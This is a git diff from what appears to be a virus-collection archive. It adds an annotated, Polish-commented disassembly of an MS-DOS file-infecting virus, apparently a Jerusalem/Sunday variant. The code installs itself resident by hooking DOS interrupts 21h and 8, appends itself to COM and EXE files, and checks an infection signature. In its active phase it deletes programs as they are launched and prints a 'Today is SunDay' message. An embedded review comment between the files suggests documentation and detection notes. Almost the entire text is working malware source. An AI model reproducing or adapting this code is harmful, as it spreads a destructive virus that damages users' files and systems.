PUSH DS ;937B 1E + POP ES ;937C 07 + MOV AH,49H ;Free allocated memory ;937D B4 49 + INT 21H ;937F CD 21 + MOV AH,4DH ;Get Return code of child proc ;9381 B4 4D + INT 21H ;9383 CD 21 + MOV AH,31H ;Keep process ;9385 B4 31 + MOV DX,OFFSET L065F ;adres konca ;9387 BA 5F 06 + MOV CL,4 ;na paragrafy ;938A B1 04 + SHR DX,CL ;938C D3 EA + ADD DX,10h ;zaokraglenie ;938E 83 C2 10 + INT 21H ;9391 CD 21 + +;----------------------------------------------- +; Wlasna obsluga int 24h +;----------------------------------------------- +L0213: XOR AX,AX ;9393 33 C0 + IRET ;9395 CF + +;================================================================ +; Nowa obsluga int 8 +;---------------------------------------------------------------- +L0216: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;9396 2E 80 3E 0E 00 01 + JNZ L93CC ;-> to nie sobota ;939C 75 2E + CMP WORD PTR CS:L001F,0 ;939E 2E 83 3E 1F 00 00 + JNZ L93C7 ;-> jeszcze mamy czas ;93A4 75 21 + PUSH AX ;93A6 50 + PUSH BX ;93A7 53 + PUSH SI ;93A8 56 + MOV 
AH,0EH ; ;93A9 B4 0E + MOV BL,1FH ;atrybut ;93AB B3 1F + LEA SI,L0251 ;'Today is SunDay...' ;93AD 8D 36 51 02 +L93B1: MOV AL,CS:[SI] ;znak ;93B1 2E 8A 04 + CMP AL,'$' ;koniec ? ;93B4 3C 24 + JZ L93BD ;-> tak ;93B6 74 05 + INT 10H ;93B8 CD 10 + INC SI ;93BA 46 + JMP SHORT L93B1 ;93BB EB F4 + +L93BD: MOV WORD PTR CS:L001F,32400 ;reset licznika na 30min;93BD 2E C7 06 1F 00 90 7E + POP SI ;93C4 5E + POP BX ;93C5 5B + POP AX ;93C6 58 +L93C7: DEC WORD PTR CS:L001F ;licznik zwloki ;93C7 2E FF 0E 1F 00 +L93CC: JMP DWORD PTR CS:L0013 ;oryginal int 8 ;93CC 2E FF 2E 13 00 + +L0251 DB 'Today is SunDay! Why do you work so hard?',LF,CR + DB 'All work and no play make you a dull boy!',LF,CR + DB "Come on ! Let's go out and have some fun!$" + +;================================================================ +; Nowa obsluga int 21h +;---------------------------------------------------------------- +L02D2: PUSHF ;9452 9C + CMP AH,0FFH ;czy to pytanie o wirusa ? ;9453 80 FC FF + JNZ L945D ;-> nie ;9456 75 05 + MOV AX,0400h ;sygnalizacja obecnosci ;9458 B8 00 04 + POPF ;945B 9D + IRET ;945C CF + +L945D: CMP AH,0DDH ;uruchomienie nosiciela COM ? ;945D 80 FC DD + JZ L9470 ;-> tak ;9460 74 0E + CMP AX,4B00h ;Load & Execute ? ;9462 3D 00 4B + JNZ L946A ;-> nie, przezroczystosc ;9465 75 03 + JMP SHORT L949E ;-> tak ;9467 EB 35 + + NOP ;9469 90 + +L946A: POPF ;946A 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;946B 2E FF 2E 17 00 + +L9470: POP AX ;<- 0DDh, uruchom nosiciela COM ;9470 58 + POP AX ;9471 58 + MOV AX,0100h ;IP ;9472 B8 00 01 + MOV CS:L000A,AX ;9475 2E A3 0A 00 + POP AX ;CS ;9479 58 + MOV CS:L000C,AX ;947A 2E A3 0C 00 + REPZ MOVSB ;przeslanie programu na wirusa ;947E F3 A4 + POPF ;9480 9D + MOV AX,CS:L000F ;? 
;9481 2E A1 0F 00 + JMP DWORD PTR CS:L000A ;9485 2E FF 2E 0A 00 + + ;<- uruchamianie programu w fazie aktywnosci +L948A: XOR CX,CX ;948A 33 C9 + MOV AX,4301h ;Set file attributes ;948C B8 01 43 + INT 21H ;948F CD 21 + MOV AH,41H ;Delete Directory Entry ;9491 B4 41 + INT 21H ;9493 CD 21 + MOV AX,4B00h ;Load & Execute ;9495 B8 00 4B + POPF ;9498 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9499 2E FF 2E 17 00 + + ;<- uruchamianie programu +L949E: CMP BYTE PTR CS:L000E,1 ;ptr aktywnosci wirusa ;949E 2E 80 3E 0E 00 01 + JZ L948A ;-> aktywny ;94A4 74 E4 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;94A6 2E C7 06 70 00 FF FF + MOV WORD PTR CS:L008F,0 ;94AD 2E C7 06 8F 00 00 00 + MOV CS:L0080,DX ;path do programu ;94B4 2E 89 16 80 00 + MOV CS:L0082,DS ;94B9 2E 8C 1E 82 00 + PUSH AX ;94BE 50 + PUSH BX ;94BF 53 + PUSH CX ;94C0 51 + PUSH DX ;94C1 52 + PUSH SI ;94C2 56 + PUSH DI ;94C3 57 + PUSH DS ;94C4 1E + PUSH ES ;94C5 06 + CLD ;94C6 FC + MOV DI,DX ;94C7 8B FA + XOR DL,DL ;aktualny drive ;94C9 32 D2 + CMP BYTE PTR [DI+1],':' ;czy path z drive ? 
;94CB 80 7D 01 3A + JNZ L94D6 ;-> nie, aktualny ;94CF 75 05 + MOV DL,[DI] ;94D1 8A 15 + AND DL,1FH ;na numer drive ;94D3 80 E2 1F +L94D6: MOV AH,36H ;Get Disk Free Space ;94D6 B4 36 + INT 21H ;94D8 CD 21 + CMP AX,0FFFFh ;94DA 3D FF FF + JNZ L94E2 ;-> drive number OK ;94DD 75 03 +L94DF: JMP L9768 ;<- drive number invalid ;94DF E9 86 02 + +L94E2: MUL BX ;* ;94E2 F7 E3 + MUL CX ;* ;94E4 F7 E1 + OR DX,DX ;94E6 0B D2 + JNZ L94EF ;-> ponad 64 KB wolne ;94E8 75 05 + CMP AX,OFFSET L065F ;=1631=dlugosc wirusa ;94EA 3D 5F 06 + JB L94DF ;94ED 72 F0 +L94EF: MOV DX,CS:L0080 ;path do programu ;94EF 2E 8B 16 80 00 + PUSH DS ;94F4 1E + POP ES ;94F5 07 + XOR AL,AL ;poszukiwanie konca ;94F6 32 C0 + MOV CX,41h ;94F8 B9 41 00 + REPNZ SCASB ;94FB F2 AE + MOV SI,CS:L0080 ;zamiana na duze litery ;94FD 2E 8B 36 80 00 +L9502: MOV AL,[SI] ;9502 8A 04 + OR AL,AL ;9504 0A C0 + JZ L9516 ;9506 74 0E + CMP AL,61H ;'a' ;9508 3C 61 + JB L9513 ;950A 72 07 + CMP AL,7AH ;'z' ;950C 3C 7A + JA L9513 ;950E 77 03 + SUB BYTE PTR [SI],20H ;' ' ;9510 80 2C 20 +L9513: INC SI ;9513 46 + JMP SHORT L9502 ;9514 EB EC + +L9516: MOV CX,0Bh ;czy to command ? 
;9516 B9 0B 00 + SUB SI,CX ;9519 2B F1 + MOV DI,OFFSET L0084 ;'command.com' ;951B BF 84 00 + PUSH CS ;951E 0E + POP ES ;951F 07 + MOV CX,0Bh ;9520 B9 0B 00 + REPZ CMPSB ;9523 F3 A6 + JNZ L952A ;-> nie ;9525 75 03 + JMP L9768 ;-> tak, odpuszczamy ;9527 E9 3E 02 + +L952A: MOV AX,4300h ;Get File Attributes ;952A B8 00 43 + INT 21H ;952D CD 21 + JB L9536 ;952F 72 05 + MOV CS:L0072,CX ;atrybut zarazanego zbioru ;9531 2E 89 0E 72 00 +L9536: JB L955D ;9536 72 25 + XOR AL,AL ;znacznik zbioru COM ;9538 32 C0 + MOV CS:L004E,AL ;0=COM, 1=EXE ;953A 2E A2 4E 00 + PUSH DS ;szukamy konca nazwy ;953E 1E + POP ES ;953F 07 + MOV DI,DX ;9540 8B FA + MOV CX,41h ;9542 B9 41 00 + REPNZ SCASB ;9545 F2 AE + CMP BYTE PTR [DI-2],4DH ;'M'-ostatnia litera ;9547 80 7D FE 4D + JZ L9558 ;-> tak, COM ;954B 74 0B + CMP BYTE PTR [DI-2],6DH ;'m' ;954D 80 7D FE 6D + JZ L9558 ;-> tak, com ;9551 74 05 + INC BYTE PTR CS:L004E ;<- EXE ;9553 2E FE 06 4E 00 +L9558: MOV AX,3D00h ;Open Handle ;9558 B8 00 3D + INT 21H ;955B CD 21 +L955D: JB L95B9 ;955D 72 5A + MOV CS:L0070,AX ;File handle ;955F 2E A3 70 00 + MOV BX,AX ;9563 8B D8 + MOV AX,4202h ;Move file ptr EOF+offs ;9565 B8 02 42 + MOV CX,0FFFFh ;-5 (piec ostatnich bajtow) ;9568 B9 FF FF + MOV DX,0FFFBh ;956B BA FB FF + INT 21H ;956E CD 21 + JB L955D ;9570 72 EB + ADD AX,5 ;+5 bajtow sygnatury ;9572 05 05 00 + MOV CS:L0011,AX ;dlugosc programu oryginalna ;9575 2E A3 11 00 + MOV CX,5 ;dlugosc sygnatury ;9579 B9 05 00 + MOV DX,OFFSET L006B ;bufor na sygnature ;957C BA 6B 00 + MOV AX,CS ;957F 8C C8 + MOV DS,AX ;9581 8E D8 + MOV ES,AX ;9583 8E C0 + MOV AH,3FH ;Read Handle ;9585 B4 3F + INT 21H ;9587 CD 21 + MOV DI,DX ;przeczytana sygnatura ;9589 8B FA + MOV SI,OFFSET L0005 ;wzorzec sygnatury ;958B BE 05 00 + REPZ CMPSB ;958E F3 A6 + JNZ L9599 ;-> jeszcze nie zarazony ;9590 75 07 + MOV AH,3EH ;Close Handle ;9592 B4 3E + INT 21H ;9594 CD 21 + JMP L9768 ;9596 E9 CF 01 + + ;<----- zarazanie zbioru +L9599: MOV AX,3524h ;Get int 24h ;9599 B8 24 35 + INT 21H ;959C CD 
21 + MOV L001B,BX ;959E 89 1E 1B 00 + MOV L001D,ES ;95A2 8C 06 1D 00 + MOV DX,OFFSET L0213 ;L9393 ;95A6 BA 13 02 + MOV AX,2524h ;Set int 24h ;95A9 B8 24 25 + INT 21H ;95AC CD 21 + + LDS DX,DWORD PTR L0080 ;ptr na path ;95AE C5 16 80 00 + XOR CX,CX ;95B2 33 C9 + MOV AX,4301h ;Set File attributes ;95B4 B8 01 43 + INT 21H ;95B7 CD 21 +L95B9: JB L95F6 ;95B9 72 3B + MOV BX,CS:L0070 ;File handle ;95BB 2E 8B 1E 70 00 + MOV AH,3EH ;Close Handle ;95C0 B4 3E + INT 21H ;95C2 CD 21 + MOV WORD PTR CS:L0070,0FFFFh ;File handle ;95C4 2E C7 06 70 00 FF FF + MOV AX,3D02h ;Open Handle R/W ;95CB B8 02 3D + INT 21H ;95CE CD 21 + JB L95F6 ;95D0 72 24 + MOV CS:L0070,AX ;File handle ;95D2 2E A3 70 00 + MOV AX,CS ;95D6 8C C8 + MOV DS,AX ;95D8 8E D8 + MOV ES,AX ;95DA 8E C0 + MOV BX,L0070 ;File handle ;95DC 8B 1E 70 00 + MOV AX,5700h ;Get File Date/Time ;95E0 B8 00 57 + INT 21H ;95E3 CD 21 + MOV L0074,DX ;95E5 89 16 74 00 + MOV L0076,CX ;95E9 89 0E 76 00 + MOV AX,4200h ;Move file ptr BOF+offs ;95ED B8 00 42 + XOR CX,CX ;95F0 33 C9 + MOV DX,CX ;95F2 8B D1 + INT 21H ;95F4 CD 21 +L95F6: JB L9636 ;95F6 72 3E + CMP BYTE PTR L004E,0 ;0=COM, 1=EXE ;95F8 80 3E 4E 00 00 + JZ L9603 ;95FD 74 04 + JMP SHORT L965C ;95FF EB 5B + + NOP ;9601 90 + NOP ;9602 90 + + ;<----- Zarazenie COM'a +L9603: MOV BX,1000h ;zadanie 64KB bufora pamieci ;9603 BB 00 10 + MOV AH,48H ;allocate memory ;9606 B4 48 + INT 21H ;9608 CD 21 + JNB L9617 ;-> powiodlo sie ;960A 73 0B + MOV AH,3EH ;Close Handle ;960C B4 3E + MOV BX,L0070 ;File handle ;960E 8B 1E 70 00 + INT 21H ;9612 CD 21 + JMP L9768 ;9614 E9 51 01 + +L9617: INC WORD PTR L008F ;9617 FF 06 8F 00 + MOV ES,AX ;nowy blok pamieci ;961B 8E C0 + XOR SI,SI ;961D 33 F6 + MOV DI,SI ;961F 8B FE + MOV CX,OFFSET L065F ;9621 B9 5F 06 + REPZ MOVSB ;przepisanie do bufora ;9624 F3 A4 + + MOV DX,DI ;pierwsze wolne miejsce ;9626 8B D7 + MOV CX,L0011 ;dlugosc programu oryginalna ;9628 8B 0E 11 00 + MOV BX,L0070 ;File handle ;962C 8B 1E 70 00 + PUSH ES ;9630 06 + POP DS ;9631 1F + MOV 
AH,3FH ;Read Handle ;9632 B4 3F + INT 21H ;9634 CD 21 +L9636: JB L9657 ;9636 72 1F + ADD DI,CX ;na poczatek zbioru ;9638 03 F9 + XOR CX,CX ;963A 33 C9 + MOV DX,CX ;963C 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;963E B8 00 42 + INT 21H ;9641 CD 21 + MOV SI,OFFSET L0005 ;dopisanie ogonka ;9643 BE 05 00 + MOV CX,5 ;9646 B9 05 00 + PUSH DS ;9649 1E + PUSH CS ;964A 0E + POP DS ;964B 1F + REPZ MOVSB ;964C F3 A4 + POP DS ;964E 1F + MOV CX,DI ;nowa dlugosc programu ;964F 8B CF + XOR DX,DX ;bufor z wynikowym programem ;9651 33 D2 + MOV AH,40H ;Write Handle ;9653 B4 40 + INT 21H ;9655 CD 21 +L9657: JB L9666 ;9657 72 0D + JMP L9723 ;9659 E9 C7 00 + + ;<----- Zarazenie EXE'ca +L965C: MOV CX,1Ch ;EXE file header - dlugosc ;965C B9 1C 00 + MOV DX,OFFSET L004F ; - bufor ;965F BA 4F 00 + MOV AH,3FH ;Read Handle ;9662 B4 3F + INT 21H ;9664 CD 21 +L9666: JB L96B2 ;9666 72 4A + MOV WORD PTR L0061,1984h ;suma kontrolna ;9668 C7 06 61 00 84 19 + MOV AX,L005D ;SS ;966E A1 5D 00 + MOV L0045,AX ;9671 A3 45 00 + MOV AX,L005F ;SP ;9674 A1 5F 00 + MOV L0043,AX ;9677 A3 43 00 + MOV AX,L0063 ;IP ;967A A1 63 00 + MOV L0047,AX ;967D A3 47 00 + MOV AX,L0065 ;CS ;9680 A1 65 00 + MOV L0049,AX ;9683 A3 49 00 + MOV AX,L0053 ;sile size - pages ;9686 A1 53 00 + CMP WORD PTR L0051,0 ;last page bytes ;9689 83 3E 51 00 00 + JZ L9691 ;968E 74 01 + DEC AX ;9690 48 +L9691: MUL WORD PTR L0078 ;* ;9691 F7 26 78 00 + ADD AX,L0051 ;+last page bytes ;9695 03 06 51 00 + ADC DX,0 ;9699 83 D2 00 + ADD AX,0Fh ;zaokraglenie ;969C 05 0F 00 + ADC DX,0 ;969F 83 D2 00 + AND AX,0FFF0h ;96A2 25 F0 FF + MOV L007C,AX ;96A5 A3 7C 00 + MOV L007E,DX ;96A8 89 16 7E 00 + ADD AX,OFFSET L0664 ;dlugosc z sygnatura ;96AC 05 64 06 + ADC DX,0 ;96AF 83 D2 00 +L96B2: JB L96EE ;96B2 72 3A + DIV WORD PTR L0078 ;bytes per page ;96B4 F7 36 78 00 + OR DX,DX ;czy jest reszta ? 
;96B8 0B D2 + JZ L96BD ;-> nie ;96BA 74 01 + INC AX ;<- jest reszta ;96BC 40 +L96BD: MOV L0053,AX ;pages per file ;96BD A3 53 00 + MOV L0051,DX ;last page bytes ;96C0 89 16 51 00 + MOV AX,L007C ;nowa dlugosc calosci ;96C4 A1 7C 00 + MOV DX,L007E ;96C7 8B 16 7E 00 + DIV WORD PTR L007A ;na paragrafy ;96CB F7 36 7A 00 + SUB AX,L0057 ;header size ;96CF 2B 06 57 00 + MOV L0065,AX ;CS wirusa ;96D3 A3 65 00 + MOV WORD PTR L0063,OFFSET L00C4 ;IP wirusa ;96D6 C7 06 63 00 C4 00 + MOV L005D,AX ;SS wirusa ;96DC A3 5D 00 + MOV WORD PTR L005F,OFFSET L065D ;SP wirusa ;96DF C7 06 5F 00 5D 06 + XOR CX,CX ;96E5 33 C9 + MOV DX,CX ;96E7 8B D1 + MOV AX,4200h ;Move file ptr BOF+offs ;96E9 B8 00 42 + INT 21H ;96EC CD 21 +L96EE: JB L96FA ;96EE 72 0A + MOV CX,1Ch ;zapis zmodyf. headera ;96F0 B9 1C 00 + MOV DX,OFFSET L004F ;96F3 BA 4F 00 + MOV AH,40H ;write handle ;96F6 B4 40 + INT 21H ;96F8 CD 21 +L96FA: JB L970D ;96FA 72 11 + CMP AX,CX ;96FC 3B C1 + JNZ L9723 ;-> nie cale poszlo ;96FE 75 23 + MOV DX,L007C ;nowa dlugosc zbioru ;9700 8B 16 7C 00 + MOV CX,L007E ;9704 8B 0E 7E 00 + MOV AX,4200h ;Move file ptr BOF+offs ;9708 B8 00 42 + INT 21H ;970B CD 21 +L970D: JB L9723 ;970D 72 14 + XOR DX,DX ;970F 33 D2 + MOV CX,065Fh ;9711 B9 5F 06 + MOV AH,40H ;Write Handle ;9714 B4 40 + INT 21H ;9716 CD 21 + MOV CX,5 ;9718 B9 05 00 + LEA DX,L0005 ;971B 8D 16 05 00 + MOV AH,40H ;Write Handle ;971F B4 40 + INT 21H ;9721 CD 21 + + ;<----- wspolny koniec +L9723: CMP WORD PTR CS:L008F,0 ;znacznik zajecia bloku ;9723 2E 83 3E 8F 00 00 + JZ L972F ;9729 74 04 + MOV AH,49H ;Free allocated memory ;972B B4 49 + INT 21H ;972D CD 21 +L972F: CMP WORD PTR CS:L0070,-1 ;File handle ;972F 2E 83 3E 70 00 FF + JZ L9768 ;-> nie otwarty ;9735 74 31 + MOV BX,CS:L0070 ;File handle ;9737 2E 8B 1E 70 00 + MOV DX,CS:L0074 ;973C 2E 8B 16 74 00 + MOV CX,CS:L0076 ;9741 2E 8B 0E 76 00 + MOV AX,5701h ;Set File Time/Date ;9746 B8 01 57 + INT 21H ;9749 CD 21 + MOV AH,3EH ;Close Handle ;974B B4 3E + INT 21H ;974D CD 21 + PUSH CS ;974F 0E 
+ POP DS ;9750 1F + LDS DX,DWORD PTR L0080 ;ptr nazwy zbioru ;9751 C5 16 80 00 + MOV CX,CS:L0072 ;atry zarazanego zbioru ;9755 2E 8B 0E 72 00 + MOV AX,4301h ;Set File Attributes ;975A B8 01 43 + INT 21H ;975D CD 21 + LEA DX,L001B ;975F 8D 16 1B 00 + MOV AX,2524h ;Set int 24h vector ;9763 B8 24 25 + INT 21H ;9766 CD 21 +L9768: POP ES ;9768 07 + POP DS ;9769 1F + POP DI ;976A 5F + POP SI ;976B 5E + POP DX ;976C 5A + POP CX ;976D 59 + POP BX ;976E 5B + POP AX ;976F 58 + POPF ;9770 9D + JMP DWORD PTR CS:L0017 ;old int 21h ;9771 2E FF 2E 17 00 + +L05F6 dw 03FCh ;<- adres wektora int ff ;9776 FC 03 + dw 0 ;9778 00 00 + + ;<------ stos + db 0 ;977A 00 + + dw 0 ;977B 00 00 + dw 0 ;977D 00 00 + dw 0 ;977F 00 00 + dw 0 ;9781 00 00 + dw 0 ;9783 00 00 + dw 0 ;9785 00 00 + dw 0 ;9787 00 00 + dw 0 ;9789 00 00 + dw 0 ;978B 00 00 + dw 0 ;978D 00 00 + dw 0 ;978F 00 00 + dw 0 ;9791 00 00 + dw 0 ;9793 00 00 + dw 0 ;9795 00 00 + dw 0 ;9797 00 00 + dw 0 ;9799 00 00 + dw 0 ;979B 00 00 + dw 0 ;979D 00 00 + dw 0 ;979F 00 00 + dw 0 ;97A1 00 00 + dw 0 ;97A3 00 00 + dw 0 ;97A5 00 00 + dw 0 ;97A7 00 00 + dw 156Ch ;97A9 6C 15 + dw 1261h ;97AB 61 12 + dw 2524h ;97AD 24 25 + dw 0005h ;97AF 05 00 + dw 0020h ;97B1 20 00 + dw 04EBh ;97B3 EB 04 + dw 0006h ;97B5 06 00 + dw 156Ch ;97B7 6C 15 + dw 2508h ;97B9 08 25 + dw 0FEA5h ;97BB A5 FE + dw 07BCh ;97BD BC 07 + dw 0216h ;97BF 16 02 + dw 065Eh ;97C1 5E 06 + dw 156Ch ;97C3 6C 15 + dw 0C89h ;97C5 89 0C + dw 012Fh ;97C7 2F 01 + dw 7F04h ;97C9 04 7F + dw 0075h ;97CB 75 00 + dw 065Eh ;97CD 5E 06 + dw 5A1Dh ;97CF 1D 5A + dw 0 ;97D1 00 00 + dw 9301h ;97D3 01 93 + dw 0BA6h ;97D5 A6 0B + dw 0213h ;97D7 13 02 + dw 0C89h ;97D9 89 0C + dw 0F202h ;97DB 02 F2 +L065D dw 2700h ;szczyt stosu ;97DD 00 27 + +L065F DB 0C8H,0F7h,0E1h,0EEh,0E7h ;97DF C8 F7 E1 EE E7 +L0664 label byte +S9180 ENDS + + END L9244 + diff --git a/MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst new file mode 100644 index 00000000..9bfc41d7 --- /dev/null 
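Review bot: The file carries no English header saying what it is — the top comment block (`; COM - na poczatku` …) is Polish-only and nothing states that the trailing `;9180 E9 92 00` column is the original load address plus opcode bytes, so a reader cannot tell this annotated disassembly from buildable source. I would add at the top `; Archival annotated disassembly (Polish comments); trailing column = original address and opcode bytes` and `; Infection marker: the 5 bytes at L0005 are appended to infected files and checked before infection; residency check is INT 21h AH=0FFh answering AX=0400h`, which is the information an analyst writing a detection rule needs first. The inline `; Mistake! Range for AL is 0 ..6 !` note is the only place recording that the day-of-week check at `CMP AL,7` cannot match, which is what the header's 'nigdy nie wlaczone' remark refers to and deserves a mention there as well. The companion Virus.MSDOS.Unknown.j_sundyb.lst added by the same commit has the same blob id (index 00000000..9bfc41d7), so it appears to be a byte-identical copy of this .asm rather than an assembler listing; one of the two could be dropped.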
+++ b/MSDOS/Virus.MSDOS.Unknown.j_sundyb.lst 
@@ -0,0 +1,727 @@ +; COM - na poczatku +; EXE - na koncu +; rozpoznaje wg nazwy (co nie COM = EXE) +;------- +; aktywacja w niedziele roku roznego od 1989 +; procedury niszczacej +;------- +; doniesienia co 30 minut +; ale nigdy nie wlaczone +;------- +; Nie zaraza COMMAND.COM'a +;------- + +LF EQU 0AH +CR EQU 0DH + +;INITIAL VALUES : CS:IP 0918:00C4 +; SS:SP 0918:065D + +;---------------- +; <- tutaj cialo programu +;---------------- + +S9180 SEGMENT STACK + ASSUME DS:S9180, SS:S9180 ,CS:S9180 ,ES:S9180 +L9180: jmp L0095 ;L9215 ;9180 E9 92 00 + + db 73h,55h ;'sU' ;9183 73 55 + + ;<- wzorzec sygnatury zarazenia +L0005 DB 0C8H,0F7h,0E1h,0EEh,0E7h ;9185 C8 F7 E1 EE E7 + +L000A dw 100h ;IP nosiciela COM ;918A 00 01 +L000C dw 1905h ;CS nosiciela COM ;918C 05 19 + +L000E db 0 ;ptr aktywnosci wirusa ;918E 00 +L000F dw 0 ;918F 00 00 +L0011 dw 9374h ;dlugosc programu oryginalna ;9191 74 93 + +L0013 dw 0FEA5h ;old int 8 ;9193 A5 +L0015 dw 0F000h ;9195 00 +L0017 dw 1460h ;old int 21h ;9197 60 14 +L0019 dw 025Bh ;9199 5B 02 +L001B dw 0556h ;old int 24h ;919B 56 05 +L001D dw 0BA6h ;919D A6 0B + +L001F dw 32400 ;30 minut zwloki ;919F 90 7E + dw 0 ;91A1 00 00 + dw 0 ;91A3 00 00 + dw 0 ;91A5 00 00 + dw 0 ;91A7 00 00 + dw 0 ;91A9 00 00 + dw 0 ;91AB 00 00 + dw 0E800h ;91AD 00 E8 + dw 5F06h ;91AF 06 5F + +L0031 dw 0C89h ;adres bloku wirusa ;91B1 89 0C +L0033 dw 80h ;wielkosc bloku wirusa (para) ;91B3 80 00 + + ;<----- Parameter Block +L0035 dw 0 ;Environment ;91B5 00 00 + dw 80h ;<- command line ;91B7 80 00 +L0039 dw 0C89h ; Segment ;91B9 89 0C + dw 5Ch ;<- FCB-1 ;91BB 5C 00 +L003D dw 0C89h ; Segment ;91BD 89 0C + dw 6Ch ;<- FCB-2 ;91BF 6C 00 +L0041 dw 0C89h ; Segment ;91C1 89 0C + +L0043 dw 0800h ;SP nosiciela ;91C3 00 08 +L0045 dw 0A58h ;rel segment stosu nosiciela ;91C5 58 0A + +L0047 dw 3D73h ;IP nosiciela ;91C7 73 3D +L0049 dw 0 ;CS nosiciela (rel) ;91C9 00 00 + + ;pierwsze 3 bajty wektora int ff +L004B dw 0F000h ;91CB 00 F0 +L004D db 46h ;91CD 46 + +L004E db 1 ;0=COM, 1=EXE 
;91CE 01 + + ;<- bufor na poczatek zbioru +L004F db 'MZ' ;91CF 4D 5A +L0051 dw 01E4h ;last page bytes ;91D1 E4 01 +L0053 dw 004Dh ;file size - pages ;91D3 4D 00 + dw 0004h ;91D5 04 00 +L0057 dw 0020h ;header size (para) ;91D7 20 00 + dw 01C1h ;91D9 C1 01 + dw 0FFFFh ;91DB FF FF +L005D dw 0918h ;SS ;91DD 18 09 +L005F dw 065Dh ;SP ;91DF 5D 06 +L0061 dw 1984h ;suma kontrolna ;91E1 84 19 +L0063 dw 00C4h ;IP ;91E3 C4 00 +L0065 dw 0918h ;CS ;91E5 18 09 + dw 001Eh ;91E7 1E 00 + dw 0000h ;91E9 00 00 + + ;<- bufor na 5 ostatnich bajtow zbioru +L006B db 0Ah,0,0FFh,0FFh,0FFh ;91EB 0A 00 FF FF FF + +L0070 dw 5 ;File handle ;91F0 05 00 +L0072 dw 20h ;atrybut zarazanego zbioru ;91F2 20 00 +L0074 dw 1031h ;91F4 31 10 +L0076 dw 0A337h ;91F6 37 A3 +L0078 dw 200h ;bytes/sector(page) ;91F8 00 02 +L007A dw 10h ;bytes/paragraph ;91FA 10 00 +L007C dw 9380h ;nowa dlugosc zbioru DWORD ;91FC 80 93 +L007E dw 0 ;91FD 00 00 + +L0080 dw 41B9h ;path nazwy programu - offset ;9200 B9 41 +L0082 dw 9B2Ah ; - segment ;9202 2A 9B + +L0084 db 'COMMAND.COM' ;9294 43 4F 4D 4D 41 4E 44 2E 43 4F 4D +L008F dw 0,0,0 ;929F 00 00 00 00 00 00 + +;================================================ +; <- Start wirusa zbiorow COM +;------------------------------------------------ +L0095: CLD ;9215 FC + MOV AH,0FFH ;kontrola rezydowania ;9216 B4 FF + INT 21H ;9218 CD 21 + CMP AH,0FFH ;921A 80 FC FF + JNB L9234 ;-> nie rezyduje ;921D 73 15 + CMP AH,4 ;921F 80 FC 04 + JB L9234 ;-> nie rezyduje ;9222 72 10 + ;<- wirus juz rezyduje + MOV AH,0DDH ;uruchom program ;9224 B4 DD + MOV DI,100h ;miejsce docelowe programu ;9226 BF 00 01 + MOV SI,OFFSET L065F ;9229 BE 5F 06 + ADD SI,DI ;miejsce aktualne programu ;922C 03 F7 + MOV CX,CS:[DI+11H] ;dlugosc programu oryginalna ;922E 2E 8B 4D 11 + INT 21H ;9232 CD 21 + +L9234: MOV AX,CS ;normalizacja segmentu ;9234 8C C8 + ADD AX,10h ;9236 05 10 00 + MOV SS,AX ;9239 8E D0 + MOV SP,OFFSET L065D ;923B BC 5D 06 + PUSH AX ;segment ;923E 50 + MOV AX,OFFSET L00C4 ;=L9244 ;923F B8 C4 00 + 
PUSH AX ;offset ;9242 50 + RETF ;9243 CB + +;================================================ +; <- Start wirusa zbioru EXE +;------------------------------------------------ +L00C4: +L9244: CLD ;9244 FC + PUSH ES ;<- PSP ;9245 06 + MOV CS:L0031,ES ;9246 2E 8C 06 31 00 + MOV CS:L0039,ES ;924B 2E 8C 06 39 00 + MOV CS:L003D,ES ;9250 2E 8C 06 3D 00 + MOV CS:L0041,ES ;9255 2E 8C 06 41 00 + MOV AX,ES ;segment poczatku pgm ;925A 8C C0 + ADD AX,10h ;925C 05 10 00 + ADD CS:L0049,AX ;relokowanie CS ;925F 2E 01 06 49 00 + ADD CS:L0045,AX ;relokowanie SS ;9264 2E 01 06 45 00 + MOV AH,0FFH ;czy juz rezyduje ? ;9269 B4 FF + INT 21H ;926B CD 21 + CMP AH,4 ;926D 80 FC 04 + JNZ L9282 ;-> jeszcze nie ;9270 75 10 + + POP ES ;<- uruchomienie pgm ;9272 07 + MOV SS,CS:L0045 ;inicjacja stosu ;9273 2E 8E 16 45 00 + MOV SP,CS:L0043 ;9278 2E 8B 26 43 00 + JMP DWORD PTR CS:L0047 ;uruchomienie nosiciela ;927D 2E FF 2E 47 00 + + ;<- zarezydowanie +L9282: XOR AX,AX ;9282 33 C0 + MOV ES,AX ;9284 8E C0 + MOV BX,03FCh ;int 0ffh ;9286 BB FC 03 + MOV AX,ES:[BX] ;9289 26 8B 07 + MOV CS:L004B,AX ;928C 2E A3 4B 00 + MOV AL,ES:[BX+2] ;9290 26 8A 47 02 + MOV CS:L004D,AL ;9294 2E A2 4D 00 + MOV WORD PTR ES:[BX],0A5F3h ;rep movsw ;9298 26 C7 07 F3 A5 + MOV BYTE PTR ES:[BX+2],0CBH ;ret ;929D 26 C6 47 02 CB + POP AX ;92A2 58 + ADD AX,10h ;92A3 05 10 00 + MOV ES,AX ;92A6 8E C0 + PUSH CS ;92A8 0E + POP DS ;92A9 1F + MOV CX,OFFSET L065F ;dl. wir. 
bez podpisu ;92AA B9 5F 06 + SHR CX,1 ;na slowa ;92AD D1 E9 + XOR SI,SI ;offset zrodlowy ;92AF 33 F6 + MOV DI,SI ;offset wynikowy ;92B1 8B FE + PUSH ES ;segment przepisanego ;92B3 06 + MOV AX,OFFSET L013C ;offset kontynuacji ;92B4 B8 3C 01 + PUSH AX ;92B7 50 + JMP DWORD PTR L05F6 ;skok w wektor int FF ;92B8 FF 2E F6 05 + + ;<- kontynuacja na nowym miejscu +L013C: MOV AX,CS ;92BC 8C C8 + MOV SS,AX ;92BE 8E D0 + MOV SP,OFFSET L065D ;92C0 BC 5D 06 + XOR AX,AX ;92C3 33 C0 + MOV DS,AX ;92C5 8E D8 + MOV AX,CS:L004B ;odtworzenie wektora int ff ;92C7 2E A1 4B 00 + MOV [BX],AX ;92CB 89 07 + MOV AL,CS:L004D ;92CD 2E A0 4D 00 + MOV [BX+2],AL ;92D1 88 47 02 + + MOV BX,SP ;sp -> paragraf ;92D4 8B DC + MOV CL,4 ;92D6 B1 04 + SHR BX,CL ;92D8 D3 EB + ADD 